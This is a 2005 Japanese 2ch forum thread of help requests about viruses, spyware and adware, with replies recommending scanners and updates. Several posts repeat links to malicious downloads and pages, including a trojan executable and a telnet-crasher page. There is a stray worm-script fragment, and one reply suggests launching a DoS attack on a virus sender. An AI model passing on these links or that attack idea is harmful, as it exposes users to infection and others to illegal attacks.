が実行されています。MS＝マイクロソフトなのかもしれませんが、
SPYだったらやだとおもって書き込みました。　これは安全ですか？

ImScInst.exe (mspy2002) はインターネットExporer 内の
Japanese/Chinese のテキストを翻訳する為のマイクロソフトの
入力メッセージの編集者(IME) に属するプロセスである。
使い易さのためのこのプログラムはnon-essential プロセス, 取付けら れている。

だいじょうぶかもな。

Hijack Thisとかで、自分のプロセスやエントリを見ておくと、変なものが入るとすぐに分かるようになる。
PCをリカバリしたあとにおすすめ。

>>564
Antinyは著作権侵害を撲滅する優良なウィルスだと思ってるのは俺だけですか？

>>571
ACCSのサイトにDDOS攻撃仕掛ける亜種もあるのに？

>>555のjaneなら対応できるというのはjane厨のガセでした

>>572
そんな物があったとは・・・

kak.hta';ken=wd+'START

>>570
んなもん、ねーぞ。ググって見そ。

【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 しています
【スキャンした結果（ウイルス名・発見場所）】　
ウイルスは特に発見されず。

【症状を具体的に、分かる限りすべて書く】
フォルダの表示項目が勝手に「縮小版」が選択されてしまう。
その後、「一覧」に変更してもまたしばらくすると元にもっどって
しまいます。おかげでjpgファイルを無理矢理見させられてしまう。

【何をしたらそんなことになったのか】
>>513さんと同じ症状で
SYSTEM32の中のIMEPADSV.EXEがTSPY_VB.AP
に感染しているとウイルスバスターに言われたので
IMEPADSV.EXEを削除しました。

spybot1.4でスキャンしたら解決しました。

今まで1.3でやってたんですけどやっぱバージョンアップは大事ですね。
スパイウェアはノートン先生だけじゃだめなのが分りました。

アドバイスくれた方ありがとうございます＆お騒がせしますた。

こういうサイトは荒らす時にウイルス使うんだろうか？
http://www.freepe.jp/i.cgi?pogrom

　人
(´ω｀)

【使用OS】 WINXP　SP1
【WindowsUpdateしてるか】 SP2がなんとなくいやでしてません(SP2以外はしています）
【AntiVirusは何を使っているか】 ノートﾝです
【ちゃんとUpdateしてるか】 最終UPDATE11/23になってました
【スキャンした結果（ウイルス名・発見場所）】 発見できません
【別のオンラインスキャンしたならその結果は】 しておりません
【症状を具体的に、分かる限りすべて書く】
メールを送ったら相手からウイルスメールが来たと苦情があり
聞けばこちらのメールを受け取っているときに「警告表示」
脅威名は「W32.Sober.X＠mm！Zip」となっており、感染場所はＮ/Ａ、感染頻度はまれ
と表示されたらしく　お互いノートンで完全スキャンしたものの何も引っかからずです。
【何をしたらそんなことになったのか】
　MXなどのAVIファイルなどは見たことがありますが
　EXEファイルなどを起動したりはしていません
【これまでにとった措置】上記以上は何もしていません（どうしていいか分からない為）
【その他の質問】
　この状況ではこちらが（メール送信者）に問題があるのでしょうか？
　またノートﾝのスキャンで見つからない物に対してどう対処がありますでしょうか？
　ノートンいれてりゃ大丈夫だろ的な発想があり、かなりあせってます（初）ぜひご教授お願いします

【使用OS】 WINXP　SP1
【WindowsUpdateしてるか】 SP2がなんとなくいやでしてません(SP2以外はしています）
【AntiVirusは何を使っているか】 ノートﾝです
【ちゃんとUpdateしてるか】 最終UPDATE11/23になってました
【スキャンした結果（ウイルス名・発見場所）】 発見できません
【別のオンラインスキャンしたならその結果は】 しておりません
【症状を具体的に、分かる限りすべて書く】
メールを送ったら相手からウイルスメールが来たと苦情があり
聞けばこちらのメールを受け取っているときに「警告表示」
脅威名は「W32.Sober.X＠mm！Zip」となっており、感染場所はＮ/Ａ、感染頻度はまれ
と表示されたらしく　お互いノートンで完全スキャンしたものの何も引っかからずです。
【何をしたらそんなことになったのか】
　MXなどのAVIファイルなどは見たことがありますが
　EXEファイルなどを起動したりはしていません
【これまでにとった措置】上記以上は何もしていません（どうしていいか分からない為）
【その他の質問】
　この状況ではこちらが（メール送信者）に問題があるのでしょうか？
　またノートﾝのスキャンで見つからない物に対してどう対処がありますでしょうか？
　ノートンいれてりゃ大丈夫だろ的な発想があり、かなりあせってます（初）ぜひご教授お願いします

駆除ツール
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.sober.removal.tool.html

２度書くほど焦っているのか？


貴方のアドレスを詐称されたんじゃないの？

>>583
>ご使用のコンピューターで W32.Sober.gen の感染として検出された場合には、このツールをダウンロードして実行してください。

だってそ

>584
なんだかこのBBS自体がうまく見れないんです
ノートン警告連発で・・・

＞貴方のアドレスを詐称されたんじゃないの？
その人とは2回しか（送受）メールしていないんですが
それでも詐称されてしまう物なのでしょうか？

>>585
そうなんです　検出はされていないんです
（今は別PCからの書き込みです）

W32.Sober.X@mm は、独自の SMTP エンジンを使用して拡散しセキュリティ設定を低下させる、
大量メール送信ワームです。
これは、侵入先のコンピュータから収集したメールアドレスに対して、E メールの添付ファイル
として自分自身を送信します。

だから、本体がいるんじゃないかと思っただけだよ。新しいウィルスだから、検出できないのと思ったんだけど。

>>588
定義ファイルが11/23と約1週間前なので　もしかして
それで引っかからないんでしょうか？
今　該当PCがそばに無いんで試せませんが・・・

【ｿｰｽ】ウイルスセキュリティ2005EX Part15【K7】
400 名前：名無しさん＠お腹いっぱい。　[sage]　投稿日：2005/11/30(水) 02:52:27
オレにはどうでもいいことなんだけども、
新種のノートントラップを2chに貼りまくっている犯人は、
主にNOD厨だと気付きつつある今日この頃（ｗ

http://www.google.co.jp/search?hl=ja&rls=GGLD%2CGGLD%3A2005-08%2CGGLD%3Aja&q=t2.exe&lr=

爆発的に書き込みが増えてるウィルス･･･
おととい140件、昨日12000件、今日14000件
ｶﾞｸﾌﾞﾙ

>>576
youのgoogleは壊れちゃっているの？　それとも、fishing？

ttp://cowscorpion.com/tasklist/tasklist/i.html
のImScInst.exeを見てよ…

Hijack Thisのエントリ的には、こんな感じ。
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC

ネットカフェなどのPCってセキュリティーってどうなの？
マンボーやポパイなどよく利用しますが

質問なんですけどウイルス感染したＰＣで宿泊などの予約を
した場合個人情報が漏れる可能性って高くなりますか？
感染したウイルスにもよると思うのですがどうなのでしょうか？
お願いします。

>>594
キーロガーのことを心配しているのか（スパイウェアだ）。
個人情報については、別に電話帳に名前載せているだけで、漏れるわけだし
宿の人間が意図的に漏らすこともあるでしょう。漏れても泣かない、心構えが大切だと思うが。

特に、ネカフェから銀行振込み等する場合とか…

>>593
法人向けのウィルスバスターとかあった気がする。

>>595
ありがとうございます。
キーロガーというスパイウェアが個人情報を漏らすものなのか？
これってトレンドマイクロのオンラインスキャンとかで感染しているか
判断できるのでしょうか？

出来る

>>597
> これってトレンドマイクロのオンラインスキャンとかで感染しているか
> 判断できるのでしょうか？

普通は、ad-awareやspybotといったアンチスパイウェアソフトで検査すべきだと
思う。無料だし。
WindowsUpdateをきちんとし、Webを見ている最中に「はい」や「yes」を選択しない、
アンチウィルスソフトを入れ、ファイアウォールを入れ、IEを使う場合は、セキュリティ
レベルを「高」にし、できればInternet Explorer以外の（例えば、firefox）ブラウザを
使用すれば、まあ、安心だと思うよ。

>>598
>>599
ありがとうございました。
勉強になりました。

ありがとうございました。
どう見ても山田君でした。

最近　あちこちの板に異常にコピペされてる、
http://www.geocities.jp/hiru072/

のアドに関するする情報ないでしょうか？
関係ないファイルを異常な数読み込みし、「情報ドットネット」というサイトに飛びますが、
明らかにダミーサイトです。

どなたかご存知ありませんでしょうか？

>>602
スレ違い

【使用OS】 Windows XP Home
【WindowsUpdateしてるか】 そこそこ
【AntiVirusは何を使っているか】 Avast
【ちゃんとUpdateしてるか】 してる
【スキャンした結果（ウイルス名・発見場所）】 C\WINDOWS\System32\hedgie.exe
【別のオンラインスキャンしたならその結果は】 特定されない
【症状を具体的に、分かる限りすべて書く】 わからない
【何をしたらそんなことになったのか】 いつのまにかに感染、HP閲覧が原因？
【これまでにとった措置】 Avastで削除。だけど、20分もたたないうちに復活してる
【その他の質問】
検索してみたんだけど、引っかからないんですが、あまり聞かないウイルスなんですかね？
何回も何回もすぐに復活してしまうので、Avastが反応しまくって困ってます

こんなんでましたぁ〜

次に私がこの作用コンピュータ私の 破裂させたコンピュータ及び記憶棒でへハイジャックこの丸太ス キャンしなければならないほどその悪い。
どの助けも非常に認め られる。徴候はまた不具になる仕事のマネージャーを含み,
私が インターネットに接続とき私は特別なantispyware ソフトウェア がこのfrokm Spyaxe を特に取除くことを必要とするが,
複数の他 ぽんと鳴ら持ち上げること定数はメッセンジャーの窓を通って。

この 丸太を乗っ取りなさい:
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　google 訳


spyっつーことだよ。

やり方解るよな？

>>605
お早い返事ありがとうございます
スパイウェアという事ですが、Avastは「トロイの木馬」として反応しています
ちなみにAd-aware、Spybotともに反応がありませんでした

Ad-aware、Spybot　が絶対というわけではないんだ。

セーフモードでスキャンしたらどうだったの？

>>606
「トロイの木馬　スパイウェア」で検索すれば疑問は解決。

>>606
a2とewidoでもスキャンしたら
それでもダメならHiJackThisのログ曝せ

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>606
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

「システムの復元」を無効にしてやってみましたか。

あぼーん

>>610
お前な、そのコテハンやめろよ。
モナーはお前一人の物じゃないぞ。

スンマセン、ほんと始めたばかりで右も左も分からん者ダス、Avastを入れて
ネットしてたんですが、最初右隅にIPアドレスみたいなのと警告（英語なので無視してました）が
その後何かに感染（スキャンで発見できませんでした）したようで、メールを勝手に送信
しているようなのです。警告が出るときは、ページの閲覧中だったのですが、新しいページを開いたり
したときに限らず、最後に開いて２０分位たっても出ました。アダルトも、
ソフトのインストールも極力避けて来ましたが、いったいどこから感染したの
でしょうか？閲覧だけで感染するものなのでしょうか？また、あの不可思議な
警告はいったい何だったのでしょうか。詳しい人お願いします。
また、質問の趣旨からテンプレを使ってませんが、その点はツッコま無いで下さい。

nyかshare使ってるんだろ

.txtファイルの日本語が全部黒い四角になってしまいます
コピペして.txtファイルではないとこ（たとえば2chへの書き込み）に貼るとちゃんと出る
【使用OS】WinXP HE
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】avast
【ちゃんとUpdateしてるか】してる

オンラインスキャンしてみたら
Adware:adware/cws.aboutblank　Windows レジストリ
とでましたググってもよく分からないのでお願いします

>青蛙 >（英語なので無視してました）

PCの標準語は英語だよん。

世界中に迷惑掛ける気か？すぐケーブル引っこ抜け。

>>613
> 最初右隅にIPアドレスみたいなのと警告（英語なので無視してました）が

avastは英語版使ってるの？
日本語版使ってるなら警告はavastじゃないな
何が警告出したんだ？

>617,618
avastは英語版を使ってます。他のソフトの関係から言語設定を中国語にして
いて日本語は文字化けするのでそうしてます。警告はavastからだと思います。
多分アタックを受けましたなどと言うアナウンスが有ったような記憶が有りますが
英語でよく分からなかった（何で攻撃されるの？）のと実害がなかったので無視してたわけです、、、
私の状況は

どこのサイトを訪れたか、どういうプログラムをインストールしているか、どのような
操作をしているか、およびメールアドレスなどを勝手に送信するもの （スパイウェア）

ということなのでしょうか。スパイウェアが何か、読んでも分からないし周りに聞ける人間
が居ません。私のパソコンは一体何をしているんでしょうか？何か他の人の迷惑になる
様な事をしてるのでしょうか？誰か教えてください。（長くなってすいません）

>青蛙
あなたは自分のpc環境を全く書いていません
また、未だにネットに繋いでいて、無駄なトラフィックを
増大させ多くの人に迷惑を掛けています。
この段階では、たとえ2chといえども回答はないでしょう。
必要な事項をひとつずつこちらから聞き出すほど親切な場ではないのです。
ネットの世界は無知は己の命取りになります。
基本的なセキュリティーの勉強をお勧めします。

この際きれいにリカバリーされてはいかがですか？

もし不可でしたら　↓ここ行って、テンプレをセーフモードで全部やってください。

【総合】スパイウェア予防駆除 Part9
http://pc8.2ch.net/test/read.cgi/sec/1126945498/

最後に　これでも退治出来ないRootkitsなるものがあります。
それは上記のスレで質問してください。

再度、リカバリーをお勧めします。

>>619
日本語のウェブは読めるという前提で、とりあえず参考になりそうなところを

ttp://enchanting.cside.com/security/spyware.html
スパイウェアの概要と一般的なツールが紹介されてるから
最初はここをチェック

ttp://www.higaitaisaku.com/
一通りやってみてもまだおかしいようならHiJackThisの
ログをとってこのサイトで研究

ttp://www.ipa.go.jp/security/antivirus/shiori.html
ウイルスもスパイウェアも予防が基本だから、こんなところも
読んどくといいかも

＞６２０、６２１
皆さんご親切にどうもありがとうございます。リカバリーは何度か試しましたが、
その都度　感染−＞リカバー＞感染　の繰り返しでした。
上記を参考にして自分なりに研究してみます。

OSくらいは書いたら？

そうすれば感染しない順序がわかるんだよ。

今更ですが自分の環境を書き直してみます。
【使用OS】winXP
【WindowsUpdateしてるか】 してない
【AntiVirusは何を使っているか】 avast&Ad-Aware
【ちゃんとUpdateしてるか】 してる
【スキャンした結果（ウイルス名・発見場所）】 avastは発見なし、
Ad-Awareは毎回引っかかるTrackingCookieの項目がいくつか表示される。
【症状を具体的に、分かる限りすべて書く】
複数有るようですが、起動時にwincupdaterという項目がCドライブに自動的にできる。
右隅に青色の箱に手紙の挟まったような表示が出る
【何をしたらそんなことになったのか】
さっぱり分かりません閲覧かな？
【これまでにとった措置】 ADかAVASTに引っかかればREMOVE
【その他の質問】あの青色の箱は何を意味しているんでしょう。

ちょっと書き間違えた。wincupdaterが出来るのは起動時、
それとwincupdaterとは何なんでしょうか？検索しても出てきません

また書き直しです、起動時では無くネット接続時　と書きたかったんですが、
焦って間違えてしまいました。レス無駄にしてすいません。
次からは書き込む前にちゃんとチェックします。

>>625
http://www.aiutamici.com/aiutaforum/topic.asp?TOPIC_ID=23744&FORUM_ID=43&CAT_ID=3&Topic_Title=wincupdater&Forum_Title=Windows+XP

　　俺には読めん。

>【WindowsUpdateしてるか】 してない

windowsupdateの重要性が分かるまでネットに繋がないでください。

>【WindowsUpdateしてるか】 してない

助言してやる気も起きないのでもう来るな！
勝手にガンガン感染していていいよ。気にすんな。

>628,629　仰ることはごもっともです。重要性は分かったつもりです

取り合えずリカバリーしてみようと思いますが、その後どんな対策ソフトの
組み合わせが一番いいのでしょうか。前はavast&Ad-Aware でだめでしたが・
（Updateしていないのが一番大きな原因かも）・・・
条件
【使用OS】winXP
【言語】設定が中国語というのは変えられないので英語もしくは中国語の
ソフトを　日本語ソフトは起動しないか文字化けします。
【その他】フリーソフトでダウンロードできるもので。

それとwincupdaterと　手紙が挟まった青い箱のようなものは何なのか
分かる人が居たらお願いします。

>wincupdater
>>627には何が書いてあったのだろう？
英語ではない。イタリア語かなぁ・・・

下のアドレスを踏んでしまったところ、
DOS画面が出て、トロイに感染してしまったようです。
ノートンでも駆除ができないのですが、どうしたら駆除できますか？

tp://dailynews.bravehost.com/Society/20051203-00000009-kyodo-soci.html

トロイ本体を自分で削除する。
（セーフモードか、トロイのプロセスを切る）

>>633
お早い回答ありがとうございます。
早速試してみます。

すみません。SOSです。
初心者ですがウイルスにかかって
しまったみたいなんです。アーティストのPVをみようとすると
画面がいきなり真っ暗になります。（何も操作できない）
ちなみに黒くなったあと画面が昔の？画面になってしますんです。
再起動する元に戻ります。これはどうすればいいですか？

>>632
ウンコTelnetは何にも感染しないから書き込むんじゃねぇ

ttp://ex14.2ch.net/test/read.cgi/news4vip/1133594514/
ここの>>1が貼ったZIPの中身が気になるので誰か調べてもらえませんか？

　

>>637
やばい・・・欲しいファイルがどんどん手に入る

自己解決しました

>>637
問題ない

>>637
すごす

>>639-642
ありがとうございました

>>636
返事が遅れてしまったのですが、ありがとうございました

【使用OS】Windows XP home sp2
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】バスター2006
【ちゃんとUpdateしてるか】はい
【スキャンした結果（ウイルス名・発見場所）】正常
【別のオンラインスキャンしたならその結果は】ノートンオンラインスキャンも正常
【症状を具体的に、分かる限りすべて書く】なし
【これまでにとった措置】Ad-awareとSpybotでも異常なし
【その他の質問】

ttp://sportsnavi.bravehost.com/fight/K1/20051125-00000008-kyodo_sp-spo.html

ウイルスらしいのですが画像が表示されるだけで
スキャン等しても異常ありません。

スキャンしても何も検出されないのですが、ウイルスではないのでしょうか？
それとも、バスターやノートンでは反応しないのでしょうか？
よろしくお願いします

>>645
ウンコtelnetを貼りにわざわざ来てんじゃねえよ　タコが

>>645
アクセスする時間帯やそれぞれのPC環境によっても変化するものだから、
検出されないなら感染してないってこと。
bravehost系でも非活動のものも多いから。
あと、観覧するブラウザの種類によっても変化する。
ちなみにsp2＋FFだとグロ画像、PC無害。

突然すいませんwindows media playerでPVをみようとすると
画面が真っ暗になり、すこし時間がたつと
復活するのですが、画像が荒くなり、
色が薄くなるのですがこれはウイルスですか？

>>648
それはコーデックの問題では？

tp://dynabook.com/pc/catalog/ss/031204m2/index_j.htm

ここにアクセスしたとたん、IEやマイコンピュータ、アウトルックなどに異常が出ました。
どのプログラムも、(操作していないのに)トップの階層へのぼってしまいます。
たとえばIEですと、お気に入りから何かのページにアクセスしても、
すぐさま強制的にホームページに戻ってしまいます。

>>650
再起動してもう一回やってみ？

>>651の御人
ノートンでスキャンした結果、何も検知できず。
ご指摘のように再起動したら、元に戻りました。
いったいこれは。。。
よければ解説しているページなどを教えていただけませんか。

ここに書き込む前にグーグルで
「ウイルス　戻る　インターネットエクスプローラ」やら
「ウイルス　階層　マイコンピュータ」などといったキーワードで検索したものの、
似た症状が見つかりませんでした。

【使用OS】 XP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートンアンチウイルス
【ちゃんとUpdateしてるか】 している
【スキャンした結果（ウイルス名・発見場所）】EPXActiveX.ocx というファイルを二個、それぞれC:\windows\Downloaded Program
Files内で見つける
【症状を具体的に、分かる限りすべて書く】
ネット中に広告がやたら表示
【これまでにとった措置】
ウイルススキャンで発見し、削除を試みるができず、直接ファイルを探して削除しようとするがファイルが表示されず、Winの検索でも見当たらない。
隠しファイルかと思い、フォルダオプションをいじるも効果なし。

どうしたらいいのでしょう？
ご教授お願いします。

ググレば何の問題も無し

>>653
何にでもハイハイとクリックするからだよ

>>653
スパイの方でそ。

bb2.exeというファイルをダウンロードしてAvast!とVirusBusterでスキャンしても
ウィルスとは認識されませんでした
しかし、他の方からはトロイであるとの指摘がありました
私の環境でも実行後はトロイであるとの結果か出ましたがが
実行せずにexeファイルの中身を調べる方法が有るのでしょうか？

【使用OS】Windows XP
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ノートンインターネットセキュリティ2004（1年追加更新済）
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】検知されず
【別のオンラインスキャンしたならその結果は】トレンドマイクロでスキャン、検知されず
【症状を具体的に、分かる限りすべて書く】
昨日から「MSRPCSS Ａttack（2）」の警告が何度も出る。
どれも同じ韓国あたりのＰＣを踏み台にした同一の侵入の疑いあり
それと前後して、パソコンの立ち上がりが遅くなったり、
ブラウザ（IE6）がいきなり開いたりするのと関係があるのか？
「MSRPCSS Attack」自体が日本語対応で見つからず、一体どんなものなのか
わからずどう対応してよいものかわかりません。
【これまでにとった措置】Spybot3.1でスキャン、検知されず

警告がでるということは、はじいてくれているのだと思うのですが、
何度も同じ地域から攻撃がきているのと、パソコンの調子が悪いのが
ひっかかっています。
攻撃の具体的な内容だけでもわかれば対応もできるのですが･･･。
なにとぞ、お知恵をお貸しください。

SP2にしてからまたおいで。

>>657
ttp://www.virustotal.com/flash/index_en.html
こことか

>>660
有難う御座いました！

（　＾３＾）≡○#) ３・）∴.;

急に音量がでかくなってしまう時があるんですが
そんなウィルスってありますか？

NOD & Spybotでは検出なしでした(´･ω･`)

バイドクター使えば直るよ

197 名前： sterfite [[email protected]] 投稿日： 2005/12/04(日) 16:05:25 ID:KYq98hzQ

l2.exe の不具合申請でＧＭ回答
HTTP://Www.guoxuecn.com/photo/hoyoo.exe
新着レス 2005/12/04(日) 16:10


こわくて踏めません

>>665
トロイみたいだ。有害。でもスレ違い
ArcaVir Win32
BitDefender BehavesLike:Win32.AV-Killer (probable variant)
Dr.Web Trojan.PWS.Lineage
Kaspersky Anti-Virus Trojan-PSW.Win32.Lineage.qp
NOD32 a variant of Win32/PSW.Lineage

>>665
>>657と同じだと思われる。

誘導
勇気が無くて見られない画像解説スレ Part760
http://etc3.2ch.net/test/read.cgi/entrance/1133451731/

winnyを実行すると、「ぬるぽ　オートラン」等の画面が表示され、田中康夫知事のスクリーンセーバー(kimmo)に変更されるウィルスに感染しました。
ctrl+alt+delでタスクマネージャ起動されなくなりました。これだけでも直したいのですがどうすれば直りますでしょうか？
【使用OS】 XP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートンアンチウイルス
【ちゃんとUpdateしてるか】 している
【スキャンした結果（ウイルス名・発見場所）】発見できず

帰れ！

>>668
いい様だなｗ素人がwinnyなんかやるなよカス

　　　　　　∧∧　　
〜′￣￣( ﾟДﾟ)
　UU￣￣　U U　　

tp://tmp5.2ch.net/test/read.cgi/download/1129317367/
↑このスレ開いたら（今はdat落ちしてますが）画面が急に赤くなって（ブルースクリーンのレッド版みたいなもの）
「ウイルスを発見しました」みたいな表示が出ました。
慌てて回線切ってケーブル抜いて再起動→DiskX　ToolsでIEキャッシュを削除→ノートン2005でスキャンしました。
【使用OS】 Me
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートンアンチウイルス2005
【ちゃんとUpdateしてるか】 している
【スキャンした結果（ウイルス名・発見場所）】ウイルスはありませんでした。トレンドマイクロのオンラインスキャンも試してみたのですが、問題ありませんでした。
今現在一応普通に使えてます。

大丈夫なのでしょうか・・・・？

ageてしまいましたすみません・・・・吊ってきますorz

>>672
大丈夫。スレ開いて、ノートンが反応したなら、ウィルスコードに反応しただけだろ。
詳しくは↓　最初の方に色々書いてある。
【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ Ver.79【2006】
http://pc8.2ch.net/test/read.cgi/sec/1133673099/

【使用OS】Windows XP Pro sp2
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】ノートンｱﾝﾁﾋﾞｰﾙｽ2003
【ちゃんとUpdateしてるか】はい
【スキャンした結果（ウイルス名・発見場所）】全ファイルしましたが正常
【別のオンラインスキャンしたならその結果は】なし
【症状を具体的に、分かる限りすべて書く】踏んだときrundllが正常じゃないってエラーが出た
【これまでにとった措置】 スナップショットを一日前に戻した
【その他の質問】

tp://www.trasher.ru/foto/trasher/trasher.jpg
こいつを誤って踏んでしまいました・・・orz
新種ウイルスだそうで・・・
対処法を教えていただければ非常にありがたいです。
何卒！

>>675
ほう　telnetクラッシャーが新種なのかい
おめでたいのう　どこのベンダーが新種だと言い張っているんか聞きたいのう

>>676
telnetクラッシャーってﾌﾞﾗｸﾗみたいなもんですか？
何ともないのなら安心なのですがどうか対処法を教えてください
ベンダーが新種と言ってるんじゃなくてこの人↓が某ｽﾚで言ってたんです

195 名前：-7.74Dさん 投稿日：2005/12/03(土) 00:23:59
新種のトロイじゃん！
削除出来ねぇ〜！

Windows XP Pro sp2、
ノートンとスパイボットとアドウエア入れて、それぞれシロです。

ファイルを削除したのに、以前よりHDDの容量が増えてます。
なにかいけないものがインストされてるんでしょうか？

>>678
増設もしていないのにハードディスクの容量など増えません
ファイル一覧の詳細でも保存しといてそれと比べろや

>>677
システムの復元ファイルでも増えたんじゃね？

>>679
すいません、増えたのは使用領域です・・・。
ファイル一覧の詳細保存の仕方は？

お・・・俺は詳細保存とかなんとか言ってないぞ！
言ってないんだからな！やり方訊かれたって分かんないぞ！

先程シマンテックのオンラインスキャンをしたところ
D:\programs\battlefield 1942 demo\battlefield 1942 demo\fpupdate.exe は　Adware.GameSpyArcade に感染しています。
D:\programs\battlefield 1942\fpupdate.exe は　Adware.GameSpyArcade に感染しています。
C:\WINDOWS\Downloaded Program Files\gsda.dll は　Adware.GameSpyArcade に感染しています。
と診断されました。
これってGAMESPYからダウンロードした何らかのファイルをウィルスと間違えてるって事ですか?
XP HOME SP2でウィルス対策は何もしてないので少し不安になり書き込みました。

>>683
間違いなく感染しているんだからそれでいいんじゃない？

>>683

オンラインスキャンまでしたなら、調べればいいじゃないか…ほい

ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.gamespyarcade.html

>>682
間違えてるんじゃなくて、フリーのアイテムを無防備にインスコした時点で
潜り込まれてるんだから検出結果は正しい。

>>672です。
>>674氏、アドバイス有難うございました。レス遅くなってすみません。

>>685
本当にありがとうございました。
GAMESPYブラウザ使用時のみのポップアップのようですので放置します。

（　＾３＾）≡○#) ３・）∴.;

知恵をお貸し下さい。

W32.Netsky.Q@mm型ウィルスメールが1日に数回届きます。
ウィルス自体はノートン先生が毎回削除してくれるのでシステムには影響ないのですが、
あまりにも頻繁にくるので発信者に「感染してるよ」と教えて駆除してもらいたいと思ってます。
ところがこのメールの発信者は詐称してあり誰が送ってきているのか自分にはお手上げです。

このウィルスに感染しているPCを特定することは出来ませんか？

>>690
recievedをみてプロバイダが特定できたらそこに通報するぐらいしかできない。

>>691
そうですか。一応連絡しつつ本人が気づくのを気長に待つことにします。ありがとうございました。

>>690
送ってきたばかりでIPアドレスがまだ変わってなさそうだったら、
DOS攻撃をしてやる。

>>692
途中経路とプロバイダに迷惑かかるからやめれ
つか逆にプロバイダに営業妨害で告発されるぞ

お願いします。

ttp://www.trasher.ru/foto/trasher/trasher.jpg

これを踏んで、画面にマイクロソフトのtelnetに
繋ごうとブラクラ状態になりました。

【使用OS】 XP SP1
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートンアンチウィルス2005
【ちゃんとUpdateしてるか】 しています
【スキャンした結果（ウイルス名・発見場所）】
スキャンしたウィルス名： HackTool.Dos
場所：Temporary Internet Files\Content.IE5
\AXHIZQ1S\trasher[1].jpg
【症状を具体的に、分かる限りすべて書く】
画面にマイクロソフトのtelnetに繋ごうとブラクラ状態
になりました。怖くて、すぐに回線を切りました。
【これまでにとった措置】
ノートンが自動的に遮断、削除しました。

もしノートン先生が遮断しなかったら、いったいどういう
被害をこうむっていたんでしょうか？

「ブラクラ状態」とは何ぞや？

>696
ブラジャーがクララ状態

http://profiles.yahoo.co.jp/ami_lala_0l8
知っている人は知っている。きっと奴の正体だ！

（　＾３＾）≡○#) ３・）∴.;

NHKのクローズアップ現代のスパイウエア特集で画像を見たり動画を見るだけで
感染するスパイウェアがあると聞いて飛んできました。

画像で感染とはJPGファイルを開いただけで感染ということでしょうか？
動画の場合、codecを取りにいくときに感染という理解でいいでしょうか？

使っているOSはknoppixです。心配でトイレにもいけません。よろしくお願いします。

>>700
このスレの住民は質問者を嘲笑うしか能が無いのでそんな事は自分で調べましょう。

もしくはOKWave

>>700
スパイウェアが心配なら、Ad-Awareとかで毎回駆除してみたらどうかね。
変なサイトいったりＦｉｒｅｆｏｘとかのブラウザ使えば、大して入ってこないけどね。

ごめ、knoppixの場合は上の使えるかどうかしんない。。。
Linuxだっけ･･･？わかんないやー。テヘ。

Windows Media Player(動画・拡張子wmv)の脆弱性を狙ったウィルスや
Microsoft Office（画像・拡張子jpg）の脆弱性を狙ったウィルスは知っているけど、

> 画像を見たり動画を見るだけで感染するスパイウェアがある

そんなスパイウェアあるのか。知らなかった…。フリーウェアをインストールするときか、
Webブラウズ中にActiveXで入れちゃうだけかと、思ってた…。心配でトイレにいけなくなりそうです。

ウイルスバスター12 インターネット セキュリティ 15ヶ月版
マカフィー セキュリティセンター (15ヶ月間更新サービス）
↑のどちらかの選択に迫られてるんだけど、
お前らならどっちにする？

スマソ　場違いだな　逝ってくる

ttp://www.trasher.ru/foto/trasher/trasher.jpg　を踏んでしまいました（泣

【使用OS】 XP
【WindowsUpdateしてるか】 していません
【AntiVirusは何を使っているか】 ウィルスバスター
【ちゃんとUpdateしてるか】 ひっかかる１時間前にしたばっか
【スキャンした結果（ウイルス名・発見場所）】
HTML_CRINET.A 　　Internet FILEの中にあるようです。
【症状を具体的に、分かる限りすべて書く】
ウィルスバスターが、ウィルスを隔離。
しかしその後黒いウィンドウが沢山出てきた。
【何をしたらそんなことになったのか】
ttp://www.trasher.ru/foto/trasher/trasher.jpg　を踏んでしまった。
【これまでにとった措置】
ウィルスバスターが隔離し、「安全です」という表示になっているが、
yahooの検索バーに文字を打ち込み、漢字変換しようとすると、文字の位置が変にズレる。

【その他の質問】
感染したばかりで、まだ見つけた被害が少ないですが、
このまま放置していて大丈夫でしょうか？
インターネットファイルにある、ウィルスは削除したほうがいいのでしょうか？

宜しくお願いします。

>>707です。
上のほうに、被害仲間がいらっしゃいましたね・・・。
でも、具体的な解決方法が書いていない！
どうしたらいいんでしょう・・・。

>>707
さっさとWindowsUpdateにいって来い
それからIEのキャッシュなぞ消してしまえ
そして忘れろ

>>706
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_CRINET.A
>>708の言うとおり、IEのキャッシュを全部消す。
最新パターンファイルで全ドライブ検索して問題なければそれ以上気にする必要はないと思われ。

>>709-710
ありがとうございます。
Windows Update、優先順位の高いUpdateはありませんと出ました。
今現在、そこそこ新しいもののようです。
ウィルスバスターでウィルス検索しましたが、何も出てきませんでした。

IEのキャッシュの削除は、ブラウザ→ツール→インターネットオプション→ファイルの削除
で、いいんですよね？
念のため、訪問履歴も消しました。
それほど悪意のあるウィルスではなくてよかったです。ありがとうございました。

おい、もまえら！(*´Д`*)
VirusTotalって知ってるか？　シラネ？ヽ(´ー`)ノ
ttp://www.virustotal.com/flash/index_en.html
このページの一番上にうｐろだがついているわけだが、
ここにウイルスじゃないか？っていうファイルを送ると
いろいろなメーカーのウイルスソフトで検索してくれる。
それで各社に報告までしてくれちゃうのだ。便利っぽ！
疑わしいファイルがあればうｐしてみ！　以上。

スパイウェアなのかウイルスなのか区別がつきませんでしたので、
こちらで質問させて頂きます。

【使用OS】 win2000
